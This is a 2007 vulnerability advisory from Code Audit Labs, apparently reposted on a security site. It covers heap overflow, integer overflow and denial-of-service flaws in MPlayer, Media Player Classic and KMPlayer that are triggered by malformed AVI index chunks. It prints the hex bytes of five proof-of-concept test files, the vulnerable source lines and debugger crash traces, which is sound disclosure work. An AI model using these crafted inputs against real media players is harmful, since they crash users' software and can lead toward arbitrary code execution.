Multiple vendor produce handling AVI file vulnerabilities

2007.09.19
Credit: Code Audit Labs
Risk: High
Local: Yes
Remote: No
CVE: CVE-2007-4938 | CVE-2007-4939 | CVE-2007-4940 | CVE-2007-4941
CWE: N/A

CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities Code Audit Labs (http://www.vulnhunt.com) Code Audit for some popular media player and discovered some vulnerabilities. one heap overflow was discovered in MPlayer. one heap overflow and one integer overflow were discovered in media player classic(mpc) and other produces base on mpc like mympc and StormPlayer). Some D.o.S (raise 100% cpu ) were discovred in KMPlayer. By tricking a user into opening a specially crafted media file, an attacker who exploit heap overflow in MPlayer or media player classic could potential execute arbitrary code with the user's privileges. Original LINK: ============== http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produc e_handling_AVI_file_vulnerabilities.txt Affected Product ================= 1 MPlayer 1.0rc1 and prior (we tested version 20070729) 2 media player classic v6.4.9.0 and prior; and other produces base on it. ( mympc 1.0.0.1 and StormPlayer 1.0.4) 3 KMPlayer v2.9.3.1210 and prior Technical Description ===================== those vulnerabilities are discoered via playing with AVI 1) indx truck size 2) wLongsPerEntry 3) nEntriesInuse Olny build 5 testcases test case 1 (new_avihead_poc1.avi) ------------------------------------------ 69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10 indx truck size 0xffffffff wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020 test case 2 (new_avihead_poc2.avi) ------------------------------------------ 69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF indx truck size 0xffffff00 wLongsPerEntry 0xffff BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0xFFFFFFFF test case 3 (new_avihead_poc3.avi) ------------------------------------------ 69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10 indx truck size 0xffffff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020 test case 4 (new_avihead_poc4.avi) ------------------------------------------ 69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10 indx truck size 0x0000ff00 wLongsPerEntry 0x0001 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x10000020 test case 5 (new_avihead_poc5.avi) ------------------------------------------ 69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40 indx truck size 0x0000ff00 wLongsPerEntry 0x0004 BIndexSubType is 0x64 bIndexType is 0x73 nEntriesInuse is 0x40000010 TEST RESULT +---------+-----------+-----------+-----------+-----------+----------+ | produce | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 | +---------+-----------+-----------+-----------+-----------+----------+ | wmp | ok | ok | ok | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mplayer | ok | ok | HO/CRASH | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mpc | HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ |KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | mympc | HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ |StormPlay| HO | HO | HO | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ | xplayer | ok | ok | ok | ok | ok | +---------+-----------+-----------+-----------+-----------+----------+ LITTLE ANALYSIS =============== MPlayer svn 20070729 (last version) 1:new_mplayer_avihead_poc3.avi null pointer in winxp or glibc 2.5(depend on compile option). if glibc <2.5(maybe prior) or win2000 sp4 ,it will be heap overflow. vulnerability code in libmpdemux/aviheader.c: 232 print_avisuperindex_chunk(s,MSGL_V); 233 234 if( ((chunksize/4)/s->wLongsPerEntry) < s->nEntriesInUse){ 235 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk\n"); 236 s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry; 237 } 238 239 // Check and fix this useless crap 240 if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) { 241 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index chunk size: %u\n",s->wLongsPerEntry); 242 s->wLongsPerEntry = sizeof(avisuperindex_entry)/4; 243 } 244 s->aIndex = calloc(s->nEntriesInUse, sizeof (avisuperindex_entry)); 245 s->stdidx = calloc(s->nEntriesInUse, sizeof (avistdindex_chunk)); 246 247 // now the real index of indices 248 for (i=0; i<s->nEntriesInUse; i++) { 249 chunksize-=16; that's funny, the above code still can be bypassed because of incorrect check order. and example code calloc(0x10000001, 0x10); it will return NULL in winxp or gligc 2.5 it will return 0x10 sizes heap in glibc <2.5(maybe prior) or win2000 sp4 0:000> g (54c.284): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00 edi=ffffff00 eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0 nv up ei ng nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00200286 gmplayer+0x13b084: 0053b084 89741500 mov [ebp+edx],esi ss:0023:01420000=02cc1b9e 0:000> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084 media player classic v6.4.9.0 (last version) -------------------------------------------- there are many produces base on media player classic. all of produces are affected. 1:new_avihead_poc1.avi heap overflow (270.198): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c edi=060ff000 eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 *** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\xx\mpc2kxp6490\mplayerc.exe mplayerc+0x2b8a4a: 006b8a4a f3a5 rep movsd ds:060fa86c=73640001 es:060ff000=???????? 0:003> kb ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a 00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6 2: new_avihead_poc2.avi new_avihead_poc3.avi VERIFIER STOP 00000004: pid 0x870: extreme size request 029B0000 : Heap handle FFFFFF08 : Size requested 00000000 : 00000000 : (870.a88): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004 edi=029b0000 eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 ntdll!DbgBreakPoint: 7c921230 cc int 3 in a word, assume indx truck size is indx_truck_size, the code like: buf =malloc(indx_truck_size+8) it will trigger integer overflow. KMPlayer v2.9.3.1210 (last version) ----------------------------------- 1:new_avihead_poc1.avi D.o.S 2:new_avihead_poc2.avi D.o.S 3:new_avihead_poc3.avi D.o.S DISCLOSURE TIMELINE: ==================== 1: 2007-07-30 notice MPlayer vendor 2: 2007-07-31 the vendor reply 3: 2007-09-12 release this report About Us: ========= Code Audit Labs secure your software,provide Professional include source code audit and binary code audit service. Code Audit Labs:" You create value for customer,We protect your value" http://www.VulnHunt.com EOF -- Code Audit Labs http://www.vulnhunt.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top